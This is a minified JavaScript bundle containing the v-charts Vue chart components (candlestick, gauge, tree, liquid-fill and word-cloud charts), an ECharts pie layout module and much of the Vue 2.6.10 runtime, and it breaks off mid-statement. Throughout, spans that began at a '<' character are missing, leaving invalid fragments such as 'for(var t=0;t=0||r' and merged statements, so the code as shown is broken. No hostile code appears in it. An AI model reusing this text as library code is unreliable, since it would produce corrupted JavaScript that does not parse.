t=e.metrics,n=e.dataType,i=e.digit,r=e.labelMap;return{trigger:"axis",axisPointer:{type:"cross"},position:function(e,t,n,i,r){var o={top:10},a=e[0]"),e.forEach((function(e){var s=e.data,l=e.seriesName,u=e.componentSubType,c=e.color,h=null==r[l]?l:r[l];if(a.push(o(c)+" "+h+": "),"candlestick"===u)a.push("
"),t.slice(0,4).forEach((function(e,t){var o=null!=r[e]?r[e]:e,l=B(s[t+1],n,i);a.push("- "+o+": "+l+"
")}));else if("line"===u){var d=B(s,n,i);a.push(d+"
")}else if("bar"===u){var f=B(s[1],n,i);a.push(f+"
")}})),a.join("")}}}function Ft(e){var t=e.downColor,n=e.upColor,i=e.MA,r=e.showMA;return{show:!1,seriesIndex:r?1+i.length:1,dimension:2,pieces:[{value:1,color:t},{value:-1,color:n}]}}function Vt(e){var t=e.showVol;return[{left:"10%",right:"8%",top:"10%",height:t?"50%":"65%",containLabel:!1},{left:"10%",right:"8%",top:"65%",height:"16%",containLabel:!1}]}function Bt(e){var t=e.dims,n="category",i=!0,r=!1,o=Rt,a={onZero:!1},s=Rt,l=Rt,u="dataMin",c="dataMax",h=1;return[{type:n,data:t,scale:i,boundaryGap:r,axisLine:a,splitLine:o,min:u,max:c},{type:n,gridIndex:h,data:t,scale:i,boundaryGap:r,axisLine:a,axisTick:s,splitLine:o,axisLabel:l,min:u,max:c}]}function jt(e){var t=e.dataType,n=e.digit,i=!0,r=1,o=2,a=Rt,s=Rt,l=Rt,u=Rt,c=function(e){return B(e,t,n)};return[{scale:i,axisTick:s,axisLabel:{formatter:c}},{scale:i,gridIndex:r,splitNumber:o,axisLine:a,axisTick:s,splitLine:u,axisLabel:l}]}function Ht(e){var t=e.start,n=e.end;return[{type:"inside",xAxisIndex:[0,1],start:t,end:n},{show:!0,xAxisIndex:[0,1],type:"slider",top:"85%",start:t,end:n}]}function qt(e){var t=e.values,n=e.volumes,i=e.upColor,r=e.downColor,o=e.showMA,a=e.MA,s=e.showVol,l=e.labelMap,u=e.digit,c=e.itemStyle,h=c||{normal:{color:i,color0:r,borderColor:null,borderColor0:null}},d={normal:{opacity:.5}},f=[{name:null==l[Dt]?Dt:l[Dt],type:"candlestick",data:t,itemStyle:h}];return o&&a.forEach((function(e){var n="MA"+e;f.push({name:null==l[n]?n:l[n],data:Gt(e,t,u),type:"line",lineStyle:d,smooth:!0})})),s&&f.push({name:"Volume",type:"bar",xAxisIndex:1,yAxisIndex:1,data:n}),f}function Gt(e,t,n){var i=[];return t.forEach((function(r,o){if(oe[s[1]]?1:-1;F.push([t,e[B],i])}}));var j=O&&Nt({showMA:y,MA:m,legendName:p,labelMap:d}),H=E&&zt({metrics:s,dataType:L,digit:u,labelMap:d}),q=b&&Ft({downColor:S,upColor:A,MA:m,showMA:y}),G=w&&Ht({start:T,end:D}),W=Vt({showVol:b}),$=Bt({dims:N}),U=jt({dataType:L,digit:u}),Z=qt({values:z,volumes:F,upColor:A,downColor:S,showMA:y,MA:m,showVol:b,labelMap:d,digit:u,itemStyle:c}),Y={link:{xAxisIndex:"all"}};return{legend:j,tooltip:H,visualMap:q,grid:W,xAxis:$,yAxis:U,dataZoom:G,series:Z,axisPointer:Y}},$t=M({},de,{name:"VeCandle",data:function(){return this.chartHandler=Wt,{}}});function Ut(e){var t=e.tooltipFormatter,n=e.dataType,i=e.digit;return{formatter:function(e){var r=e.seriesName,o=e.data,a=o.value,s=o.name;if(t)return t.apply(null,arguments);var l=[];return l.push(r+": "),l.push(B(a,n[r],i)+" "+s),l.join("")}}}function Zt(e){var t=e.rows,n=e.dimension,i=e.metrics,r=e.digit,o=e.dataType,a=e.labelMap,s=e.seriesMap,l=e.dataName,u=t.map((function(e){var t=e[n],u=s[t],c={type:"gauge",name:null!=a[t]?a[t]:t,data:[{name:l[t]||"",value:e[i]}],detail:{formatter:function(e){return B(e,o[t],r)}},axisLabel:{formatter:function(e){return B(e,o[t],r)}}};return u&&Object.keys(u).forEach((function(e){O(c[e])?M(c[e],u[e]):c[e]=u[e]})),c}));return u}var Yt=function(e,t,n,i){var r=n.dimension,o=void 0===r?e[0]:r,a=n.metrics,s=void 0===a?e[1]:a,l=n.digit,u=void 0===l?2:l,c=n.dataType,h=void 0===c?{}:c,d=n.labelMap,f=void 0===d?{}:d,p=n.seriesMap,g=void 0===p?{}:p,m=n.dataName,v=void 0===m?{}:m,y=i.tooltipFormatter,_=i.tooltipVisible,b=_&&Ut({tooltipFormatter:y,dataType:h}),x=Zt({rows:t,dimension:o,metrics:s,digit:u,dataType:h,labelMap:f,seriesMap:g,dataName:v});return{tooltip:b,series:x}},Xt=M({},de,{name:"VeGauge",data:function(){return this.chartHandler=Yt,{}}});function Kt(e){var t=e.dimension,n=e.rows,i=n.map((function(e){return e[t]}));return{data:i}}function Jt(e){var t=e.tooltipFormatter;return{trigger:"item",triggerOn:"mousemove",formatter:t}}function Qt(e){var t=e.dimension,n=e.metrics,i=e.rows,r=e.seriesMap,o=[];return i.forEach((function(e){var i=e[t],a=r[i],s={type:"tree",name:e[t],data:e[n]};r[e[t]]&&Object.keys(a).forEach((function(e){O(s[e])?M(s[e],a[e]):s[e]=a[e]})),o.push(s)})),o}var en=function(e,t,n,i){var r=n.dimension,o=void 0===r?e[0]:r,a=n.metrics,s=void 0===a?e[1]:a,l=n.seriesMap,u=void 0===l?{}:l,c=i.legendVisible,h=i.tooltipFormatter,d=i.tooltipVisible,f=Qt({dimension:o,metrics:s,rows:t,seriesMap:u}),p=c&&t.length>1&&Kt({dimension:o,rows:t}),g=d&&Jt({tooltipFormatter:h});return{series:f,legend:p,tooltip:g}},tn=M({},de,{name:"VeTree",data:function(){return this.chartHandler=en,{}}});function nn(e){var t=e.tooltipFormatter,n=e.dataType,i=e.digit;return{show:!0,formatter:function(e){var r=e.seriesName,o=e.value;return t?t.apply(null,arguments):[r+": ",B(o,n,i)].join("")}}}function rn(e){var t=e.dimension,n=e.metrics,i=e.seriesMap,r=e.rows,o=e.wave,a=o,s=P(i)?i.length:0;return r.slice().map((function(e,r){var l=[],u={type:"liquidFill"},c=e[t],h=Number(e[n]),d={};return P(i)?d=i[r]?i[r]:i[s-1]:O(i[c])&&(d=i[c]),P(o)&&P(o[0])&&(a=P(o[r])?o[r]:o[o.length-1]),l.push({value:h}),a&&a.length&&(l=l.concat(a.map((function(e){return{value:e}})))),u=M(u,{data:l,name:c},d),u}))}var on=function(e,t,n,i){var r=n.dimension,o=void 0===r?e[0]:r,a=n.metrics,s=void 0===a?e[1]:a,l=n.seriesMap,u=void 0===l?{}:l,c=n.dataType,h=void 0===c?"percent":c,d=n.digit,f=void 0===d?2:d,p=n.wave,g=void 0===p?[]:p,m=i.tooltipVisible,v=i.tooltipFormatter,y=m&&nn({tooltipFormatter:v,dataType:h,digit:f}),_=rn({rows:t,columns:e,dimension:o,metrics:s,seriesMap:u,wave:g});return{tooltip:y,series:_}},an=M({},de,{name:"VeLiquidfill",data:function(){return this.chartHandler=on,{}}});function sn(e){var t=e.dimension,n=e.metrics,i=e.rows,r=e.color,o=e.sizeMax,a=e.sizeMin,s=e.shape,l={type:"wordCloud",textStyle:{normal:{color:!P(r)&&r?r:function(){return"rgb("+[Math.round(160*Math.random()),Math.round(160*Math.random()),Math.round(160*Math.random())].join(",")+")"}}},shape:s,sizeRange:[a,o]},u=P(r)?r.length:0,c=i.slice().map((function(e){var i={name:e[t],value:e[n]};return u>0&&(i.textStyle={normal:{color:r[Math.floor(Math.random()*u)]}}),i}));return l.data=c,[l]}function ln(e){var t=e.tooltipFormatter;return{show:!0,formatter:function(e){var n=e.data,i=n.name,r=n.value;return t?t.apply(null,e):i+": "+r}}}var un=function(e,t,n,i){var r=n.dimension,o=void 0===r?e[0]:r,a=n.metrics,s=void 0===a?e[1]:a,l=n.color,u=void 0===l?"":l,c=n.sizeMax,h=void 0===c?60:c,d=n.sizeMin,f=void 0===d?12:d,p=n.shape,g=void 0===p?"circle":p,m=i.tooltipVisible,v=i.tooltipFormatter,y=sn({dimension:o,metrics:s,rows:t,color:u,sizeMax:h,sizeMin:f,shape:g}),_=m&&ln({tooltipFormatter:v});return{series:y,tooltip:_}},cn=M({},de,{name:"VeWordcloud",data:function(){return this.chartHandler=un,{}}}),hn=[fe,pe,xe,Le,Ee,Ve,Ge,Xe,Ke,rt,at,lt,dt,bt,Tt,$t,Xt,tn,an,cn];function dn(e,t){hn.forEach((function(t){e.component(t.name,t)}))}"undefined"!==typeof window&&window.Vue&&dn(window.Vue);var fn={VeBar:fe,VeHistogram:pe,VeRing:Ee,VeLine:xe,VePie:Le,VeWaterfall:Ve,VeFunnel:Ge,VeRadar:Xe,VeChart:Ke,VeMap:rt,VeBmap:at,VeAmap:lt,VeSankey:dt,VeScatter:Tt,VeCandle:$t,VeGauge:Xt,VeTree:tn,VeLiquidfill:an,VeWordcloud:cn,install:dn};return fn}))},"282b":function(e,t,n){var i=n("6d8b");function r(e){for(var t=0;t=0||r&&i.indexOf(r,s)<0)){var l=t.getShallow(s);null!=l&&(o[e[a][0]]=l)}}return o}}e.exports=r},2877:function(e,t,n){"use strict";function i(e,t,n,i,r,o,a,s){var l,u="function"===typeof e?e.options:e;if(t&&(u.render=t,u.staticRenderFns=n,u._compiled=!0),i&&(u.functional=!0),o&&(u._scopeId="data-v-"+o),a?(l=function(e){e=e||this.$vnode&&this.$vnode.ssrContext||this.parent&&this.parent.$vnode&&this.parent.$vnode.ssrContext,e||"undefined"===typeof __VUE_SSR_CONTEXT__||(e=__VUE_SSR_CONTEXT__),r&&r.call(this,e),e&&e._registeredComponents&&e._registeredComponents.add(a)},u._ssrRegister=l):r&&(l=s?function(){r.call(this,(u.functional?this.parent:this).$root.$options.shadowRoot)}:r),l)if(u.functional){u._injectStyles=l;var c=u.render;u.render=function(e,t){return l.call(t),c(e,t)}}else{var h=u.beforeCreate;u.beforeCreate=h?[].concat(h,l):[l]}return{exports:e,options:u}}n.d(t,"a",(function(){return i}))},"292e":function(e,t,n){var i=n("3842"),r=i.parsePercent,o=i.linearMap,a=n("f934"),s=n("bb70"),l=n("6d8b"),u=2*Math.PI,c=Math.PI/180;function h(e,t){return a.getLayoutRect(e.getBoxLayoutParams(),{width:t.getWidth(),height:t.getHeight()})}function d(e,t,n,i){t.eachSeriesByType(e,(function(e){var t=e.getData(),i=t.mapDimension("value"),a=h(e,n),d=e.get("center"),f=e.get("radius");l.isArray(f)||(f=[0,f]),l.isArray(d)||(d=[d,d]);var p=r(a.width,n.getWidth()),g=r(a.height,n.getHeight()),m=Math.min(p,g),v=r(d[0],p)+a.x,y=r(d[1],g)+a.y,_=r(f[0],m/2),b=r(f[1],m/2),x=-e.get("startAngle")*c,w=e.get("minAngle")*c,k=0;t.each(i,(function(e){!isNaN(e)&&k++}));var S=t.getSum(i),M=Math.PI/(S||k)*2,A=e.get("clockwise"),C=e.get("roseType"),T=e.get("stillShowZeroSum"),I=t.getDataExtent(i);I[0]=0;var D=u,L=0,E=x,O=A?1:-1;if(t.each(i,(function(e,n){var i;if(isNaN(e))t.setItemLayout(n,{angle:NaN,startAngle:NaN,endAngle:NaN,clockwise:A,cx:v,cy:y,r0:_,r:C?NaN:b,viewRect:a});else{i="area"!==C?0===S&&T?M:e*M:u/k,i=0&&Math.floor(t)===t&&isFinite(e)}function f(e){return r(e)&&"function"===typeof e.then&&"function"===typeof e.catch}function p(e){return null==e?"":Array.isArray(e)||c(e)&&e.toString===u?JSON.stringify(e,null,2):String(e)}function g(e){var t=parseFloat(e);return isNaN(t)?e:t}function m(e,t){for(var n=Object.create(null),i=e.split(","),r=0;r-1)return e.splice(n,1)}}var _=Object.prototype.hasOwnProperty;function b(e,t){return _.call(e,t)}function x(e){var t=Object.create(null);return function(n){var i=t[n];return i||(t[n]=e(n))}}var w=/-(\w)/g,k=x((function(e){return e.replace(w,(function(e,t){return t?t.toUpperCase():""}))})),S=x((function(e){return e.charAt(0).toUpperCase()+e.slice(1)})),M=/\B([A-Z])/g,A=x((function(e){return e.replace(M,"-$1").toLowerCase()}));function C(e,t){function n(n){var i=arguments.length;return i?i>1?e.apply(t,arguments):e.call(t,n):e.call(t)}return n._length=e.length,n}function T(e,t){return e.bind(t)}var I=Function.prototype.bind?T:C;function D(e,t){t=t||0;var n=e.length-t,i=new Array(n);while(n--)i[n]=e[n+t];return i}function L(e,t){for(var n in t)e[n]=t[n];return e}function E(e){for(var t={},n=0;n0,ne=Q&&Q.indexOf("edge/")>0,ie=(Q&&Q.indexOf("android"),Q&&/iphone|ipad|ipod|ios/.test(Q)||"ios"===J),re=(Q&&/chrome\/\d+/.test(Q),Q&&/phantomjs/.test(Q),Q&&Q.match(/firefox\/(\d+)/)),oe={}.watch,ae=!1;if(X)try{var se={};Object.defineProperty(se,"passive",{get:function(){ae=!0}}),window.addEventListener("test-passive",null,se)}catch(ka){}var le=function(){return void 0===Z&&(Z=!X&&!K&&"undefined"!==typeof e&&(e["process"]&&"server"===e["process"].env.VUE_ENV)),Z},ue=X&&window.__VUE_DEVTOOLS_GLOBAL_HOOK__;function ce(e){return"function"===typeof e&&/native code/.test(e.toString())}var he,de="undefined"!==typeof Symbol&&ce(Symbol)&&"undefined"!==typeof Reflect&&ce(Reflect.ownKeys);he="undefined"!==typeof Set&&ce(Set)?Set:function(){function e(){this.set=Object.create(null)}return e.prototype.has=function(e){return!0===this.set[e]},e.prototype.add=function(e){this.set[e]=!0},e.prototype.clear=function(){this.set=Object.create(null)},e}();var fe=O,pe=0,ge=function(){this.id=pe++,this.subs=[]};ge.prototype.addSub=function(e){this.subs.push(e)},ge.prototype.removeSub=function(e){y(this.subs,e)},ge.prototype.depend=function(){ge.target&&ge.target.addDep(this)},ge.prototype.notify=function(){var e=this.subs.slice();for(var t=0,n=e.length;t-1)if(o&&!b(r,"default"))a=!1;else if(""===a||a===A(e)){var l=et(String,r.type);(l<0||s0&&(a=Ct(a,(t||"")+"_"+n),At(a[0])&&At(u)&&(c[l]=we(u.text+a[0].text),a.shift()),c.push.apply(c,a)):s(a)?At(u)?c[l]=we(u.text+a):""!==a&&c.push(we(a)):At(a)&&At(u)?c[l]=we(u.text+a.text):(o(e._isVList)&&r(a.tag)&&i(a.key)&&r(t)&&(a.key="__vlist"+t+"_"+n+"__"),c.push(a)));return c}function Tt(e){var t=e.$options.provide;t&&(e._provided="function"===typeof t?t.call(e):t)}function It(e){var t=Dt(e.$options.inject,e);t&&(Ie(!1),Object.keys(t).forEach((function(n){Pe(e,n,t[n])})),Ie(!0))}function Dt(e,t){if(e){for(var n=Object.create(null),i=de?Reflect.ownKeys(e):Object.keys(e),r=0;r0,a=e?!!e.$stable:!o,s=e&&e.$key;if(e){if(e._normalized)return e._normalized;if(a&&i&&i!==n&&s===i.$key&&!o&&!i.$hasNormal)return i;for(var l in r={},e)e[l]&&"$"!==l[0]&&(r[l]=Pt(t,l,e[l]))}else r={};for(var u in t)u in r||(r[u]=Rt(t,u));return e&&Object.isExtensible(e)&&(e._normalized=r),W(r,"$stable",a),W(r,"$key",s),W(r,"$hasNormal",o),r}function Pt(e,t,n){var i=function(){var e=arguments.length?n.apply(null,arguments):n({});return e=e&&"object"===typeof e&&!Array.isArray(e)?[e]:Mt(e),e&&(0===e.length||1===e.length&&e[0].isComment)?void 0:e};return n.proxy&&Object.defineProperty(e,t,{get:i,enumerable:!0,configurable:!0}),i}function Rt(e,t){return function(){return e[t]}}function Nt(e,t){var n,i,o,a,s;if(Array.isArray(e)||"string"===typeof e)for(n=new Array(e.length),i=0,o=e.length;i1?D(n):n;for(var i=D(arguments,1),r='event handler for "'+e+'"',o=0,a=n.length;odocument.createEvent("Event").timeStamp&&(Zn=function(){return Yn.now()})}function Xn(){var e,t;for(Un=Zn(),Gn=!0,Bn.sort((function(e,t){return e.id-t.id})),Wn=0;WnWn&&Bn[n].id>e.id)n--;Bn.splice(n+1,0,e)}else Bn.push(e);qn||(qn=!0,pt(Xn))}}var ti=0,ni=function(e,t,n,i,r){this.vm=e,r&&(e._watcher=this),e._watchers.push(this),i?(this.deep=!!i.deep,this.user=!!i.user,this.lazy=!!i.lazy,this.sync=!!i.sync,this.before=i.before):this.deep=this.user=this.lazy=this.sync=!1,this.cb=n,this.id=++ti,this.active=!0,this.dirty=this.lazy,this.deps=[],this.newDeps=[],this.depIds=new he,this.newDepIds=new he,this.expression="","function"===typeof t?this.getter=t:(this.getter=U(t),this.getter||(this.getter=O)),this.value=this.lazy?void 0:this.get()};ni.prototype.get=function(){var e;ve(this);var t=this.vm;try{e=this.getter.call(t,t)}catch(ka){if(!this.user)throw ka;tt(ka,t,'getter for watcher "'+this.expression+'"')}finally{this.deep&&mt(e),ye(),this.cleanupDeps()}return e},ni.prototype.addDep=function(e){var t=e.id;this.newDepIds.has(t)||(this.newDepIds.add(t),this.newDeps.push(e),this.depIds.has(t)||e.addSub(this))},ni.prototype.cleanupDeps=function(){var e=this.deps.length;while(e--){var t=this.deps[e];this.newDepIds.has(t.id)||t.removeSub(this)}var n=this.depIds;this.depIds=this.newDepIds,this.newDepIds=n,this.newDepIds.clear(),n=this.deps,this.deps=this.newDeps,this.newDeps=n,this.newDeps.length=0},ni.prototype.update=function(){this.lazy?this.dirty=!0:this.sync?this.run():ei(this)},ni.prototype.run=function(){if(this.active){var e=this.get();if(e!==this.value||l(e)||this.deep){var t=this.value;if(this.value=e,this.user)try{this.cb.call(this.vm,e,t)}catch(ka){tt(ka,this.vm,'callback for watcher "'+this.expression+'"')}else this.cb.call(this.vm,e,t)}}},ni.prototype.evaluate=function(){this.value=this.get(),this.dirty=!1},ni.prototype.depend=function(){var e=this.deps.length;while(e--)this.deps[e].depend()},ni.prototype.teardown=function(){if(this.active){this.vm._isBeingDestroyed||y(this.vm._watchers,this);var e=this.deps.length;while(e--)this.deps[e].removeSub(this);this.active=!1}};var ii={enumerable:!0,configurable:!0,get:O,set:O};function ri(e,t,n){ii.get=function(){return this[t][n]},ii.set=function(e){this[t][n]=e},Object.defineProperty(e,n,ii)}function oi(e){e._watchers=[];var t=e.$options;t.props&&ai(e,t.props),t.methods&&pi(e,t.methods),t.data?si(e):Oe(e._data={},!0),t.computed&&ci(e,t.computed),t.watch&&t.watch!==oe&&gi(e,t.watch)}function ai(e,t){var n=e.$options.propsData||{},i=e._props={},r=e.$options._propKeys=[],o=!e.$parent;o||Ie(!1);var a=function(o){r.push(o);var a=Xe(o,t,n,e);Pe(i,o,a),o in e||ri(e,"_props",o)};for(var s in t)a(s);Ie(!0)}function si(e){var t=e.$options.data;t=e._data="function"===typeof t?li(t,e):t||{},c(t)||(t={});var n=Object.keys(t),i=e.$options.props,r=(e.$options.methods,n.length);while(r--){var o=n[r];0,i&&b(i,o)||G(o)||ri(e,"_data",o)}Oe(t,!0)}function li(e,t){ve();try{return e.call(t,t)}catch(ka){return tt(ka,t,"data()"),{}}finally{ye()}}var ui={lazy:!0};function ci(e,t){var n=e._computedWatchers=Object.create(null),i=le();for(var r in t){var o=t[r],a="function"===typeof o?o:o.get;0,i||(n[r]=new ni(e,a||O,O,ui)),r in e||hi(e,r,o)}}function hi(e,t,n){var i=!le();"function"===typeof n?(ii.get=i?di(t):fi(n),ii.set=O):(ii.get=n.get?i&&!1!==n.cache?di(t):fi(n.get):O,ii.set=n.set||O),Object.defineProperty(e,t,ii)}function di(e){return function(){var t=this._computedWatchers&&this._computedWatchers[e];if(t)return t.dirty&&t.evaluate(),ge.target&&t.depend(),t.value}}function fi(e){return function(){return e.call(this,this)}}function pi(e,t){e.$options.props;for(var n in t)e[n]="function"!==typeof t[n]?O:I(t[n],e)}function gi(e,t){for(var n in t){var i=t[n];if(Array.isArray(i))for(var r=0;r-1)return this;var n=D(arguments,1);return n.unshift(this),"function"===typeof e.install?e.install.apply(e,n):"function"===typeof e&&e.apply(null,n),t.push(e),this}}function Mi(e){e.mixin=function(e){return this.options=Ze(this.options,e),this}}function Ai(e){e.cid=0;var t=1;e.extend=function(e){e=e||{};var n=this,i=n.cid,r=e._Ctor||(e._Ctor={});if(r[i])return r[i];var o=e.name||n.options.name;var a=function(e){this._init(e)};return a.prototype=Object.create(n.prototype),a.prototype.constructor=a,a.cid=t++,a.options=Ze(n.options,e),a["super"]=n,a.options.props&&Ci(a),a.options.computed&&Ti(a),a.extend=n.extend,a.mixin=n.mixin,a.use=n.use,B.forEach((function(e){a[e]=n[e]})),o&&(a.options.components[o]=a),a.superOptions=n.options,a.extendOptions=e,a.sealedOptions=L({},a.options),r[i]=a,a}}function Ci(e){var t=e.options.props;for(var n in t)ri(e.prototype,"_props",n)}function Ti(e){var t=e.options.computed;for(var n in t)hi(e.prototype,n,t[n])}function Ii(e){B.forEach((function(t){e[t]=function(e,n){return n?("component"===t&&c(n)&&(n.name=n.name||e,n=this.options._base.extend(n)),"directive"===t&&"function"===typeof n&&(n={bind:n,update:n}),this.options[t+"s"][e]=n,n):this.options[t+"s"][e]}}))}function Di(e){return e&&(e.Ctor.options.name||e.tag)}function Li(e,t){return Array.isArray(e)?e.indexOf(t)>-1:"string"===typeof e?e.split(",").indexOf(t)>-1:!!h(e)&&e.test(t)}function Ei(e,t){var n=e.cache,i=e.keys,r=e._vnode;for(var o in n){var a=n[o];if(a){var s=Di(a.componentOptions);s&&!t(s)&&Oi(n,o,i,r)}}}function Oi(e,t,n,i){var r=e[t];!r||i&&r.tag===i.tag||r.componentInstance.$destroy(),e[t]=null,y(n,t)}_i(ki),vi(ki),In(ki),On(ki),yn(ki);var Pi=[String,RegExp,Array],Ri={name:"keep-alive",abstract:!0,props:{include:Pi,exclude:Pi,max:[String,Number]},created:function(){this.cache=Object.create(null),this.keys=[]},destroyed:function(){for(var e in this.cache)Oi(this.cache,e,this.keys)},mounted:function(){var e=this;this.$watch("include",(function(t){Ei(e,(function(e){return Li(t,e)}))})),this.$watch("exclude",(function(t){Ei(e,(function(e){return!Li(t,e)}))}))},render:function(){var e=this.$slots.default,t=kn(e),n=t&&t.componentOptions;if(n){var i=Di(n),r=this,o=r.include,a=r.exclude;if(o&&(!i||!Li(o,i))||a&&i&&Li(a,i))return t;var s=this,l=s.cache,u=s.keys,c=null==t.key?n.Ctor.cid+(n.tag?"::"+n.tag:""):t.key;l[c]?(t.componentInstance=l[c].componentInstance,y(u,c),u.push(c)):(l[c]=t,u.push(c),this.max&&u.length>parseInt(this.max)&&Oi(l,u[0],u,this._vnode)),t.data.keepAlive=!0}return t||e&&e[0]}},Ni={KeepAlive:Ri};function zi(e){var t={get:function(){return H}};Object.defineProperty(e,"config",t),e.util={warn:fe,extend:L,mergeOptions:Ze,defineReactive:Pe},e.set=Re,e.delete=Ne,e.nextTick=pt,e.observable=function(e){return Oe(e),e},e.options=Object.create(null),B.forEach((function(t){e.options[t+"s"]=Object.create(null)})),e.options._base=e,L(e.options.components,Ni),Si(e),Mi(e),Ai(e),Ii(e)}zi(ki),Object.defineProperty(ki.prototype,"$isServer",{get:le}),Object.defineProperty(ki.prototype,"$ssrContext",{get:function(){return this.$vnode&&this.$vnode.ssrContext}}),Object.defineProperty(ki,"FunctionalRenderContext",{value:Kt}),ki.version="2.6.10";var Fi=m("style,class"),Vi=m("input,textarea,option,select,progress"),Bi=function(e,t,n){return"value"===n&&Vi(e)&&"button"!==t||"selected"===n&&"option"===e||"checked"===n&&"input"===e||"muted"===n&&"video"===e},ji=m("contenteditable,draggable,spellcheck"),Hi=m("events,caret,typing,plaintext-only"),qi=function(e,t){return Zi(t)||"false"===t?"false":"contenteditable"===e&&Hi(t)?t:"true"},Gi=m("allowfullscreen,async,autofocus,autoplay,checked,compact,controls,declare,default,defaultchecked,defaultmuted,defaultselected,defer,disabled,enabled,formnovalidate,hidden,indeterminate,inert,ismap,itemscope,loop,multiple,muted,nohref,noresize,noshade,novalidate,nowrap,open,pauseonexit,readonly,required,reversed,scoped,seamless,selected,sortable,translate,truespeed,typemustmatch,visible"),Wi="http://www.w3.org/1999/xlink",$i=function(e){return":"===e.charAt(5)&&"xlink"===e.slice(0,5)},Ui=function(e){return $i(e)?e.slice(6,e.length):""},Zi=function(e){return null==e||!1===e};function Yi(e){var t=e.data,n=e,i=e;while(r(i.componentInstance))i=i.componentInstance._vnode,i&&i.data&&(t=Xi(i.data,t));while(r(n=n.parent))n&&n.data&&(t=Xi(t,n.data));return Ki(t.staticClass,t.class)}function Xi(e,t){return{staticClass:Ji(e.staticClass,t.staticClass),class:r(e.class)?[e.class,t.class]:t.class}}function Ki(e,t){return r(e)||r(t)?Ji(e,Qi(t)):""}function Ji(e,t){return e?t?e+" "+t:e:t||""}function Qi(e){return Array.isArray(e)?er(e):l(e)?tr(e):"string"===typeof e?e:""}function er(e){for(var t,n="",i=0,o=e.length;i-1?sr[e]=t.constructor===window.HTMLUnknownElement||t.constructor===window.HTMLElement:sr[e]=/HTMLUnknownElement/.test(t.toString())}var ur=m("text,number,password,search,email,tel,url");function cr(e){if("string"===typeof e){var t=document.querySelector(e);return t||document.createElement("div")}return e}function hr(e,t){var n=document.createElement(e);return"select"!==e||t.data&&t.data.attrs&&void 0!==t.data.attrs.multiple&&n.setAttribute("multiple","multiple"),n}function dr(e,t){return document.createElementNS(nr[e],t)}function fr(e){return document.createTextNode(e)}function pr(e){return document.createComment(e)}function gr(e,t,n){e.insertBefore(t,n)}function mr(e,t){e.removeChild(t)}function vr(e,t){e.appendChild(t)}function yr(e){return e.parentNode}function _r(e){return e.nextSibling}function br(e){return e.tagName}function xr(e,t){e.textContent=t}function wr(e,t){e.setAttribute(t,"")}var kr=Object.freeze({createElement:hr,createElementNS:dr,createTextNode:fr,createComment:pr,insertBefore:gr,removeChild:mr,appendChild:vr,parentNode:yr,nextSibling:_r,tagName:br,setTextContent:xr,setStyleScope:wr}),Sr={create:function(e,t){Mr(t)},update:function(e,t){e.data.ref!==t.data.ref&&(Mr(e,!0),Mr(t))},destroy:function(e){Mr(e,!0)}};function Mr(e,t){var n=e.data.ref;if(r(n)){var i=e.context,o=e.componentInstance||e.elm,a=i.$refs;t?Array.isArray(a[n])?y(a[n],o):a[n]===o&&(a[n]=void 0):e.data.refInFor?Array.isArray(a[n])?a[n].indexOf(o)<0&&a[n].push(o):a[n]=[o]:a[n]=o}}var Ar=new _e("",{},[]),Cr=["create","activate","update","remove","destroy"];function Tr(e,t){return e.key===t.key&&(e.tag===t.tag&&e.isComment===t.isComment&&r(e.data)===r(t.data)&&Ir(e,t)||o(e.isAsyncPlaceholder)&&e.asyncFactory===t.asyncFactory&&i(t.asyncFactory.error))}function Ir(e,t){if("input"!==e.tag)return!0;var n,i=r(n=e.data)&&r(n=n.attrs)&&n.type,o=r(n=t.data)&&r(n=n.attrs)&&n.type;return i===o||ur(i)&&ur(o)}function Dr(e,t,n){var i,o,a={};for(i=t;i<=n;++i)o=e[i].key,r(o)&&(a[o]=i);return a}function Lr(e){var t,n,a={},l=e.modules,u=e.nodeOps;for(t=0;tg?(h=i(n[y+1])?null:n[y+1].elm,k(e,h,n,p,y,o)):p>y&&M(e,t,d,g)}function T(e,t,n,i){for(var o=n;o-1?Hr(e,t,n):Gi(t)?Zi(n)?e.removeAttribute(t):(n="allowfullscreen"===t&&"EMBED"===e.tagName?"true":t,e.setAttribute(t,n)):ji(t)?e.setAttribute(t,qi(t,n)):$i(t)?Zi(n)?e.removeAttributeNS(Wi,Ui(t)):e.setAttributeNS(Wi,t,n):Hr(e,t,n)}function Hr(e,t,n){if(Zi(n))e.removeAttribute(t);else{if(ee&&!te&&"TEXTAREA"===e.tagName&&"placeholder"===t&&""!==n&&!e.__ieph){var i=function(t){t.stopImmediatePropagation(),e.removeEventListener("input",i)};e.addEventListener("input",i),e.__ieph=!0}e.setAttribute(t,n)}}var qr={create:Br,update:Br};function Gr(e,t){var n=t.elm,o=t.data,a=e.data;if(!(i(o.staticClass)&&i(o.class)&&(i(a)||i(a.staticClass)&&i(a.class)))){var s=Yi(t),l=n._transitionClasses;r(l)&&(s=Ji(s,Qi(l))),s!==n._prevClass&&(n.setAttribute("class",s),n._prevClass=s)}}var Wr,$r={create:Gr,update:Gr},Ur="__r",Zr="__c";function Yr(e){if(r(e[Ur])){var t=ee?"change":"input";e[t]=[].concat(e[Ur],e[t]||[]),delete e[Ur]}r(e[Zr])&&(e.change=[].concat(e[Zr],e.change||[]),delete e[Zr])}function Xr(e,t,n){var i=Wr;return function r(){var o=t.apply(null,arguments);null!==o&&Qr(e,r,n,i)}}var Kr=at&&!(re&&Number(re[1])<=53);function Jr(e,t,n,i){if(Kr){var r=Un,o=t;t=o._wrapper=function(e){if(e.target===e.currentTarget||e.timeStamp>=r||e.timeStamp<=0||e.target.ownerDocument!==document)return o.apply(this,arguments)}}Wr.addEventListener(e,t,ae?{capture:n,passive:i}:n)}function Qr(e,t,n,i){(i||Wr).removeEventListener(e,t._wrapper||t,n)}function eo(e,t){if(!i(e.data.on)||!i(t.data.on)){var n=t.data.on||{},r=e.data.on||{};Wr=t.elm,Yr(n),bt(n,r,Jr,Qr,Xr,t.context),Wr=void 0}}var to,no={create:eo,update:eo};function io(e,t){if(!i(e.data.domProps)||!i(t.data.domProps)){var n,o,a=t.elm,s=e.data.domProps||{},l=t.data.domProps||{};for(n in r(l.__ob__)&&(l=t.data.domProps=L({},l)),s)n in l||(a[n]="");for(n in l){if(o=l[n],"textContent"===n||"innerHTML"===n){if(t.children&&(t.children.length=0),o===s[n])continue;1===a.childNodes.length&&a.removeChild(a.childNodes[0])}if("value"===n&&"PROGRESS"!==a.tagName){a._value=o;var u=i(o)?"":String(o);ro(a,u)&&(a.value=u)}else if("innerHTML"===n&&rr(a.tagName)&&i(a.innerHTML)){to=to||document.createElement("div"),to.innerHTML=""+o+"";var 